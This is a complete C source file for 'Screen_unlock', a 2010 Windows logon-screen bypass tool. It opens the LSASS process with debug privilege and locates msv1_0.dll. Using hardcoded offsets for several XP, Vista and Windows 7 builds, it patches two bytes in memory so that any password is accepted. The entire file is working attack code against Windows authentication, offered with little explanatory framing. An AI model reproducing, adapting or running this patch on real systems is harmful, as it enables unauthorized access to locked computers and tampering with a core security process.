/*
 *  Screen_unlock - Windows logon screen unlocker (2010.7.30)
 *
 *  Copyright 2010 Makoto Shiotsuki <shio@st.rim.or.jp>
 *
 *  References:
 *      http://www.storm.net.nz/static/files/winlockpwn
 *      http://www.metasploit.com/ (meterpreter/screen_unlock.rb)
 *      http://blog.didierstevens.com/2006/08/21/playing-with-utilmanexe/
 *      lsadump2 by Todd A. Sabin (EnableDebugPriv, find_pid)
 *
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <stdio.h>
#include <windows.h>
#include <winnt.h>
#include <stdlib.h>
#include <tchar.h> 

#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "version.lib")
#pragma comment(lib, "User32.lib")

char msg[2048];
int nmsg = 0;

typedef unsigned long NTSTATUS;

typedef struct {
    USHORT Length;
    USHORT MaxLen;
    USHORT *Buffer;
} UNICODE_STRING;

NTSTATUS (__stdcall *NtQuerySystemInformation)(
		IN ULONG SysInfoClass,
                IN OUT PVOID SystemInformation,
                IN ULONG SystemInformationLength,
                OUT PULONG RetLen
                );

LONG (__stdcall *RtlCompareUnicodeString)(
		IN UNICODE_STRING *,
                IN UNICODE_STRING *,
                IN ULONG CaseInsensitve
                );

struct process_info {
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved1[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;
    ULONG BasePriority;
    ULONG ProcessId;
    // etc.
};

void GetDllVersion(char *dllver)
{
    LPTSTR lpszFilePath = "msv1_0.dll"; 
    DWORD dwDummy; 
    DWORD dwFVISize = GetFileVersionInfoSize(lpszFilePath , &dwDummy); 
    LPBYTE lpVersionInfo; 
    unsigned int uLen; 
    VS_FIXEDFILEINFO *lpFfi; 
    DWORD dwFileVersionMS; 
    DWORD dwFileVersionLS; 
    DWORD dwLeftMost; 
    DWORD dwSecondLeft; 
    DWORD dwSecondRight; 
    DWORD dwRightMost; 

    lpVersionInfo = malloc(dwFVISize);
    GetFileVersionInfo(lpszFilePath , 0 , dwFVISize , lpVersionInfo); 
    VerQueryValue(lpVersionInfo , _T("\\") , (LPVOID *)&lpFfi , &uLen); 
    dwFileVersionMS = lpFfi->dwFileVersionMS; 
    dwFileVersionLS = lpFfi->dwFileVersionLS; 
    free(lpVersionInfo); 
    dwLeftMost = HIWORD(dwFileVersionMS); 
    dwSecondLeft = LOWORD(dwFileVersionMS); 
    dwSecondRight = HIWORD(dwFileVersionLS); 
    dwRightMost = LOWORD(dwFileVersionLS); 
    sprintf(dllver,  "%d.%d.%d.%d",
               dwLeftMost, dwSecondLeft, dwSecondRight, dwRightMost); 
}

int EnableDebugPriv (void)
{
    HANDLE hToken = 0;
    DWORD dwErr = 0;
    TOKEN_PRIVILEGES newPrivs;

    if (!OpenProcessToken (GetCurrentProcess (),
                           TOKEN_ADJUST_PRIVILEGES,
                           &hToken))
    {
        dwErr = GetLastError ();
        nmsg += sprintf(msg + nmsg, "Unable to open process token: %d\n", dwErr);
        goto exit;
    }

    if (!LookupPrivilegeValue (NULL, SE_DEBUG_NAME,
                               &newPrivs.Privileges[0].Luid))
    {
        dwErr = GetLastError ();
        nmsg += sprintf(msg + nmsg, "Unable to lookup privilege: %d\n", dwErr);
        goto exit;
    }

    newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    newPrivs.PrivilegeCount = 1;
    
    if (!AdjustTokenPrivileges (hToken, FALSE, &newPrivs, 0, NULL, NULL))
    {
        dwErr = GetLastError ();
        nmsg += sprintf(msg + nmsg, "Unable to adjust token privileges: %d\n", dwErr);
        goto exit;
    }

exit:
    if (hToken)
        CloseHandle (hToken);

    return dwErr;
}

int find_pid (DWORD *ppid)
{
    HINSTANCE hNtDll;
    NTSTATUS rc;
    ULONG ulNeed = 0;
    void *buf = NULL;
    size_t len = 0;
    int ret = 0;

    hNtDll = LoadLibrary ("NTDLL");
    if (!hNtDll)
        return 0;

    NtQuerySystemInformation = (void*)GetProcAddress (hNtDll, "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
        return 0;

    RtlCompareUnicodeString = (void*)GetProcAddress (hNtDll, "RtlCompareUnicodeString");
    if (!RtlCompareUnicodeString)
        return 0;

    do {
        len += 2000;
        buf = realloc (buf, len);
        if (!buf)
            return 0;
        rc = NtQuerySystemInformation (5, buf, len, &ulNeed);
    } while (rc == 0xc0000004);  // STATUS_INFO_LEN_MISMATCH

    if (rc <0) {
        free (buf);
        return 0;
    }

    //
    // Ok, now slog through the data looking for our guy.
    //
    {
        struct process_info *p = (struct process_info *)buf;
        int done = 0;
        UNICODE_STRING lsass = { 18, 20, L"LSASS.EXE" };

        while (!done) {
            if ((p->ProcessName.Buffer != 0)
                && (RtlCompareUnicodeString (&lsass, &p->ProcessName, 1) == 0)) {
                    *ppid = p->ProcessId;
                    ret = 1;
                    goto exit;
            }
            done = p->NextEntryDelta == 0;
            p = (struct process_info *)(((char *)p) + p->NextEntryDelta);
        }
    }

exit:
    free (buf);
    FreeLibrary (hNtDll);

    return ret;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                                        LPSTR lpCmdLine, int nCmdShow)
{
    HMODULE hDll;
    DWORD dwPid = 0;
    HANDLE hLsassProc;
    DWORD dwErr;
    unsigned char curr[2] = { 0x00, 0x00 };
    unsigned char orig[2] = { 0x32, 0xc0 };
    unsigned char patch[2] = { 0xb0, 0x01 };
    unsigned int offset;
    char dllver[1024];
    HWINSTA hwinsta;
    HDESK   hdesk;
    int ret = 0;

    hwinsta = OpenWindowStation("WinSta0", TRUE,
                                    WINSTA_ACCESSCLIPBOARD   |
                                    WINSTA_ACCESSGLOBALATOMS |
                                    WINSTA_CREATEDESKTOP     |
                                    WINSTA_ENUMDESKTOPS      |
                                    WINSTA_ENUMERATE         |
                                    WINSTA_EXITWINDOWS       |
                                    WINSTA_READATTRIBUTES    |
                                    WINSTA_READSCREEN        |
                                    WINSTA_WRITEATTRIBUTES);
    SetProcessWindowStation(hwinsta);
    hdesk = OpenDesktop("Winlogon", 0, FALSE,
                                    DESKTOP_CREATEMENU |
                                    DESKTOP_CREATEWINDOW |
                                    DESKTOP_ENUMERATE    |
                                    DESKTOP_HOOKCONTROL  |
                                    DESKTOP_JOURNALPLAYBACK |
                                    DESKTOP_JOURNALRECORD |
                                    DESKTOP_READOBJECTS |
                                    DESKTOP_SWITCHDESKTOP |
                                    DESKTOP_WRITEOBJECTS);
    SetThreadDesktop(hdesk);

    memset(msg, '\x00', sizeof(msg));

    GetDllVersion(dllver);
    nmsg += sprintf(msg + nmsg, "Version of msv1_0.dll: %s.\n", dllver);

    if (!find_pid (&dwPid)) {
        nmsg += sprintf(msg + nmsg, "Unable to find lsass.exe pid... Exiting.\n");
        ret = 1; goto exit;
    }

    hDll = LoadLibrary("msv1_0.dll");

    nmsg += sprintf(msg + nmsg, "Address of msv1_0.dll: %08x\n", hDll);
    nmsg += sprintf(msg + nmsg, "Pid of lsass.exe: %d\n", dwPid);

    if (EnableDebugPriv() != 0)
    {
        nmsg += sprintf(msg + nmsg, "Failed enabling Debug privilege.  Proceeding.\n");
    }

    hLsassProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (hLsassProc == 0)
    {
        dwErr = GetLastError();
        nmsg += sprintf(msg + nmsg, "Failed to open lsass: %d.  Exiting.\n", dwErr);
        ret = 1; goto exit;
    }

    if (strcmp(dllver, "5.1.2600.2180") == 0) {
        offset = (unsigned int)hDll + 0x99cc;
    } else if (strcmp(dllver, "5.1.2600.5512") == 0) {
        offset = (unsigned int)hDll + 0x98c0;
    } else if (strcmp(dllver, "5.1.2600.5876") == 0) {
        offset = (unsigned int)hDll + 0x9878;
    } else if (strcmp(dllver, "6.0.6001.18000") == 0) {
        offset = (unsigned int)hDll + 0xb827;
    } else if (strcmp(dllver, "6.1.7600.16385") == 0) {
        offset = (unsigned int)hDll + 0xe93e;
    } else if (strcmp(dllver, "6.1.7600.16420") == 0) {
        offset = (unsigned int)hDll + 0xe93e;
    } else {
        nmsg += sprintf(msg + nmsg, "Unknown dll version: %s.  Exiting.\n", dllver);
        ret = 1; goto exit;
    }

    nmsg += sprintf(msg + nmsg, "Patch offset: %08x\n", offset);

    if (!ReadProcessMemory(hLsassProc, (LPCVOID)offset,
                                                (LPVOID)curr, 2, NULL)) {
        dwErr = GetLastError();
        nmsg += sprintf(msg + nmsg, "Failed to read memory: %d.  Exiting.\n", dwErr);
        ret = 1; goto exit;
    }

    if (curr[0] != orig[0] || curr[1] != orig[1]) {
        nmsg += sprintf(msg + nmsg, "Not match...: %02x %02x. Exiting.\n",
                                                          curr[0], curr[1]);
        ret = 1; goto exit;
    }

    nmsg += sprintf(msg + nmsg, "Patching LSASS.EXE... OK?\n");

    if (MessageBox(NULL, msg, "Screen Unlock", MB_OKCANCEL) == IDOK) {
        if (!WriteProcessMemory(hLsassProc, (LPCVOID)offset,
                                                (LPVOID)patch, 2, NULL)) {
            dwErr = GetLastError();
            nmsg += sprintf(msg + nmsg, "Failed to write memory: %d.  Exiting.\n", dwErr);
            ret = 1; goto exit;
        }
        nmsg += sprintf(msg + nmsg, "Done.\n");
    } else {
        nmsg += sprintf(msg + nmsg, "Cancelled.\n");
    }

exit:

    MessageBox(NULL, msg, "Screen Unlock", MB_OK);
    CloseDesktop(hdesk);
    CloseWindowStation(hwinsta);
    FreeLibrary(hDll);
    CloseHandle(hLsassProc);
    exit(ret);
}
